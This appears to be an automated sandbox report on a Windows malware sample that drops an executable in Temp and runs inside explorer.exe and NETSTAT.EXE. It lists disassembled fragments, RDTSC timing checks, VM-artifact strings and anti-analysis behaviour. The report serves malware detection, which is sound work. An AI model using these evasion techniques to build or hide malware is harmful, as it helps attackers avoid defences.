          Source: Binary string: wntdll.pdbUGP source: sfxwkrzgst.exe, 00000002.00000003.252451378.0000000002910000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000002.00000003.251040803.0000000002780000.00000004.00001000.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: sfxwkrzgst.exe, sfxwkrzgst.exe, 00000004.00000002.336274086.000000000139F000.00000040.00000800.00020000.00000000.sdmp, sfxwkrzgst.exe, 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000F.00000002.512606910.0000000002C30000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000F.00000002.513012657.0000000002D4F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B822 push eax; ret 4_2_0041B828
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B82B push eax; ret 4_2_0041B892
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B88C push eax; ret 4_2_0041B892
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041D246 push 3317952Ch; ret 4_2_0041D4A7
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00415D74 push ebx; ret 4_2_00415D75
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00415E30 push ds; iretd 4_2_00415E32
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041B7D5 push eax; ret 4_2_0041B828
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0040C7E1 pushfd ; retf 4_2_0040C7EA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012FD0D1 push ecx; ret 4_2_012FD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02CAD0D1 push ecx; ret 15_2_02CAD0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B822 push eax; ret 15_2_0043B828
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B82B push eax; ret 15_2_0043B892
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043D0C5 push ebp; ret 15_2_0043D0C7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B88C push eax; ret 15_2_0043B892
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043D3EA push 3317952Ch; ret 15_2_0043D4A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00435D74 push ebx; ret 15_2_00435D75
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_00435E30 push ds; iretd 15_2_00435E32
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043B7D5 push eax; ret 15_2_0043B828
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0042C7E1 pushfd ; retf 15_2_0042C7EA
          Source: C:\Users\user\Desktop\4505682666.exeFile created: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (95).png
          Source: C:\Users\user\Desktop\4505682666.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-455
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000428604 second address: 000000000042860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 000000000042899E second address: 00000000004289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3308Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeAPI coverage: 6.2 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 6.8 %
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\4505682666.exeAPI call chain: ExitProcess graph end nodegraph_0-3759
          Source: explorer.exe, 00000006.00000000.266949938.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
          Source: explorer.exe, 00000006.00000000.273156967.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
          Source: explorer.exe, 00000006.00000000.274096213.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.273175014.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
          Source: 4505682666.exe, 00000000.00000003.256791543.00000000007AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
          Source: explorer.exe, 00000006.00000000.295963226.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.285804347.00000000083FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: explorer.exe, 00000006.00000000.322076519.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000006.00000000.285187233.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.266949938.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720402 mov eax, dword ptr fs:[00000030h]2_2_02720402
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720616 mov eax, dword ptr fs:[00000030h]2_2_02720616
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720706 mov eax, dword ptr fs:[00000030h]2_2_02720706
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_027206C7 mov eax, dword ptr fs:[00000030h]2_2_027206C7
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720744 mov eax, dword ptr fs:[00000030h]2_2_02720744
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov eax, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov ecx, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D513A mov eax, dword ptr fs:[00000030h]4_2_012D513A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9100 mov eax, dword ptr fs:[00000030h]4_2_012A9100
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AC962 mov eax, dword ptr fs:[00000030h]4_2_012AC962
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB171 mov eax, dword ptr fs:[00000030h]4_2_012AB171
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB944 mov eax, dword ptr fs:[00000030h]4_2_012CB944
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013251BE mov eax, dword ptr fs:[00000030h]4_2_013251BE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D61A0 mov eax, dword ptr fs:[00000030h]4_2_012D61A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013649A4 mov eax, dword ptr fs:[00000030h]4_2_013649A4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov eax, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013269A6 mov eax, dword ptr fs:[00000030h]4_2_013269A6
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA185 mov eax, dword ptr fs:[00000030h]4_2_012DA185
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CC182 mov eax, dword ptr fs:[00000030h]4_2_012CC182
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2990 mov eax, dword ptr fs:[00000030h]4_2_012D2990
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB1E1 mov eax, dword ptr fs:[00000030h]4_2_012AB1E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013341E8 mov eax, dword ptr fs:[00000030h]4_2_013341E8
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D002D mov eax, dword ptr fs:[00000030h]4_2_012D002D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BB02A mov eax, dword ptr fs:[00000030h]4_2_012BB02A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA830 mov eax, dword ptr fs:[00000030h]4_2_012CA830
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01374015 mov eax, dword ptr fs:[00000030h]4_2_01374015
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01374015 mov eax, dword ptr fs:[00000030h]4_2_01374015
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327016 mov eax, dword ptr fs:[00000030h]4_2_01327016
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327016 mov eax, dword ptr fs:[00000030h]4_2_01327016
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327016 mov eax, dword ptr fs:[00000030h]4_2_01327016
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01371074 mov eax, dword ptr fs:[00000030h]4_2_01371074
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362073 mov eax, dword ptr fs:[00000030h]4_2_01362073
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C0050 mov eax, dword ptr fs:[00000030h]4_2_012C0050
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C0050 mov eax, dword ptr fs:[00000030h]4_2_012C0050
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E90AF mov eax, dword ptr fs:[00000030h]4_2_012E90AF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DF0BF mov ecx, dword ptr fs:[00000030h]4_2_012DF0BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DF0BF mov eax, dword ptr fs:[00000030h]4_2_012DF0BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DF0BF mov eax, dword ptr fs:[00000030h]4_2_012DF0BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9080 mov eax, dword ptr fs:[00000030h]4_2_012A9080
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01323884 mov eax, dword ptr fs:[00000030h]4_2_01323884
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01323884 mov eax, dword ptr fs:[00000030h]4_2_01323884
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A58EC mov eax, dword ptr fs:[00000030h]4_2_012A58EC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB8E4 mov eax, dword ptr fs:[00000030h]4_2_012CB8E4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB8E4 mov eax, dword ptr fs:[00000030h]4_2_012CB8E4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A40E1 mov eax, dword ptr fs:[00000030h]4_2_012A40E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A40E1 mov eax, dword ptr fs:[00000030h]4_2_012A40E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A40E1 mov eax, dword ptr fs:[00000030h]4_2_012A40E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136131B mov eax, dword ptr fs:[00000030h]4_2_0136131B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012ADB60 mov ecx, dword ptr fs:[00000030h]4_2_012ADB60
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D3B7A mov eax, dword ptr fs:[00000030h]4_2_012D3B7A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D3B7A mov eax, dword ptr fs:[00000030h]4_2_012D3B7A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012ADB40 mov eax, dword ptr fs:[00000030h]4_2_012ADB40
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378B58 mov eax, dword ptr fs:[00000030h]4_2_01378B58
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AF358 mov eax, dword ptr fs:[00000030h]4_2_012AF358
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4BAD mov eax, dword ptr fs:[00000030h]4_2_012D4BAD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4BAD mov eax, dword ptr fs:[00000030h]4_2_012D4BAD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4BAD mov eax, dword ptr fs:[00000030h]4_2_012D4BAD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01375BA5 mov eax, dword ptr fs:[00000030h]4_2_01375BA5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B1B8F mov eax, dword ptr fs:[00000030h]4_2_012B1B8F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B1B8F mov eax, dword ptr fs:[00000030h]4_2_012B1B8F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B mov eax, dword ptr fs:[00000030h]4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B mov eax, dword ptr fs:[00000030h]4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B mov eax, dword ptr fs:[00000030h]4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135D380 mov ecx, dword ptr fs:[00000030h]4_2_0135D380
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2397 mov eax, dword ptr fs:[00000030h]4_2_012D2397
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136138A mov eax, dword ptr fs:[00000030h]4_2_0136138A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DB390 mov eax, dword ptr fs:[00000030h]4_2_012DB390
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CDBE9 mov eax, dword ptr fs:[00000030h]4_2_012CDBE9
